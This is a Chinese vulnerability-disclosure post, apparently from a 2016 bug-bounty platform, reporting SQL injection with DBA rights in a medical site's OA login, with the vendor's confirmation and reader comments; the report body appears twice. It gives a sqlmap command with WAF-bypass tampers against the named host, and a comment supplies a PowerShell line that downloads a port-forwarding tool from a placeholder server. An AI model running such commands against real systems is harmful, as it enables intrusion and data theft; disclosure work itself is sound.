寻医问药某站SQL注入漏洞（DBA权限）

漏洞地址：

http://oa.xywy.com/

我们来抓包，并修改用户名

然后丢入神器sqlmap

sqlmap.py -r 4.txt --tamper space2comment.py,base64encode.py -p loginCode --level 5 --risk 3 --dbms mssql --
 
 dbs

数据库

这权限看着舒服

看看ip

我勒个去，内网。。

好吧手里没服务器不然可以试试远程下载运行木马。。

还是看看表段

1000多，好吧，百度金和软件数据库字典也没找到登录的

审核大大

会有高分吗？会上首页吗？

漏洞地址：

http://oa.xywy.com/

我们来抓包，并修改用户名

然后丢入神器sqlmap

sqlmap.py -r 4.txt --tamper space2comment.py,base64encode.py -p loginCode --level 5 --risk 3 --dbms mssql --
 
 dbs

数据库

这权限看着舒服

看看ip

我勒个去，内网。。

好吧手里没服务器不然可以试试远程下载运行木马。。

还是看看表段

1000多，好吧，百度金和软件数据库字典也没找到登录的

审核大大

会有高分吗？会上首页吗？

你们更专业

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2016-03-13 00:44

厂商回复：

其实我们尽力了，我在入职时就发现了oa存在多个类型的高危漏洞（包含此漏洞）并进行了修复，dba权限也改为了低权限，并且把oa移入了内网，以及做了一些安全配置、安全方案等等。谁知道oa又上公网了，我也是今天才知道，而且可能是版本覆盖等原因使原来的漏洞又重现了，连权限也改为dba了。无奈归无奈，高分还是要给的！

最新状态：

2016-03-14：感谢白帽！oa服务器已经断网处理。

1. 2016-03-13 01:58 | 小豹 ( 实习白帽子 | Rank:57 漏洞数:10 | 没有不老的誓言，没有不变的承诺，踏上旅途...)

   1

   @寻医问药 刚才实验了下，可否深入。系统不开源，吃奶的力气都用上了，找不道路径/尴尬 在添加附件的目录有个123.aspx，或者重名名了，不是很清楚。看看吧，话说你们那里招人吗？

   1# 回复此人

2. 2016-03-14 15:23 | whynot ( 普通白帽子 | Rank:678 漏洞数:136 | 为你解冻冰河 为你放弃世界有何不可)

   1

   金蝶确实洞不少 寻医问药的大牛！

   2# 回复此人

3. 2016-03-14 16:31 | MARCH0 ( 实习白帽子 | Rank:50 漏洞数:13 | 求实习)

   1

   dir E:/xxx /s /a 可以列路径出来

   3# 回复此人

4. 2016-03-14 16:42 | 小豹 ( 实习白帽子 | Rank:57 漏洞数:10 | 没有不老的誓言，没有不变的承诺，踏上旅途...)

   1

   @MARCH0 站库分离的。

   4# 回复此人

5. 2016-03-14 16:46 | 小豹 ( 实习白帽子 | Rank:57 漏洞数:10 | 没有不老的誓言，没有不变的承诺，踏上旅途...)

   1

   @MARCH0 powershell (new-object System.Net.WebClient).DownloadFile( 'http://www.xxxxx.com/lcx.rar','lcx.exe') 可以这样。手里没服务器/囧

   5# 回复此人

6. 2016-03-14 17:06 | 土夫子 ( 普通白帽子 | Rank:507 漏洞数:88 | 看似山穷水尽，终将柳暗花明)

   1

   会玩，还绕上waf了

   6# 回复此人

7. 2016-03-14 20:07 | Mr_Java ( 普通白帽子 | Rank:170 漏洞数:43 | 高三党，当，档，裆！)

   1

   waf 这环节比较高级。。。。

   7# 回复此人

8. 2016-03-15 03:30 | 神话般的孩纸 ( 路人 | Rank:25 漏洞数:9 | 少年,放下鼠标！我们一起去拯救世界！)

   3

   其实我们尽力了，我在入职时就发现了oa存在多个类型的高危漏洞。。。唉，言语中透露出无奈，表示同情

   8# 回复此人

9. 2016-03-15 11:54 | i3esn0w ( 实习白帽子 | Rank:92 漏洞数:24 | 我是一个大白菜,很大很大的白菜)

   1

   @小豹 这个漏洞可惜了

   9# 回复此人

10. 2016-03-15 12:55 | 小豹 ( 实习白帽子 | Rank:57 漏洞数:10 | 没有不老的誓言，没有不变的承诺，踏上旅途...)

    1

    @i3esn0w 没法。。当时条件有限

    10# 回复此人

11. 2016-03-15 14:40 | 寻医问药(乌云厂商)

    1

    @i3esn0w 能理解你们的心情，呵呵呵。

    11# 回复此人

12. 2016-03-15 17:01 | 狮子找女友 ( 路人 | Rank:8 漏洞数:3 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

    1

    --risk 3这种都用上了，破坏不大么？

    12# 回复此人

13. 2016-03-15 17:16 | 小豹 ( 实习白帽子 | Rank:57 漏洞数:10 | 没有不老的誓言，没有不变的承诺，踏上旅途...)

    1

    @狮子找女友 http://www.cn-sec.com/drops//tips/143 并不是update语句

    13# 回复此人

14. 2016-03-17 09:22 | bcwr ( 路人 | Rank:19 漏洞数:2 | 努力挖洞)

    1

    寻医问药漏洞挺多的

    14# 回复此人

15. 2016-03-17 20:39 | p1tt0 ( 路人 | Rank:2 漏洞数:1 | 我就是我，颜色不一样的烟火)

    1

    @寻医问药良心运维小哥，，赞一个

    15# 回复此人

16. 2016-03-18 09:03 | 寻医问药(乌云厂商)

    1

    @小豹 很N种方法，不用另一台服务器，虽然我认为做渗透有一台公网机是必要的。如果要拿webshell,有个漏洞可以秒拿webshell，其实不拿shell也可以做到整网渗透……

    16# 回复此人

17. 2016-03-18 09:05 | 寻医问药(乌云厂商)

    1

    @p1tt0 感谢理解，运维不容易。

    17# 回复此人

18. 2016-03-28 09:53 | 小豹 ( 实习白帽子 | Rank:57 漏洞数:10 | 没有不老的誓言，没有不变的承诺，踏上旅途...)

    1

    @寻医问药 技术不够好啊，学习ing

    18# 回复此人

19. 2016-05-03 14:37 | 你大爷在此 百无禁忌 ( 路人 | Rank:18 漏洞数:9 | 迎风尿三丈 顺风八十米)

    0

    这个 厂商有点屌啊

    19# 回复此人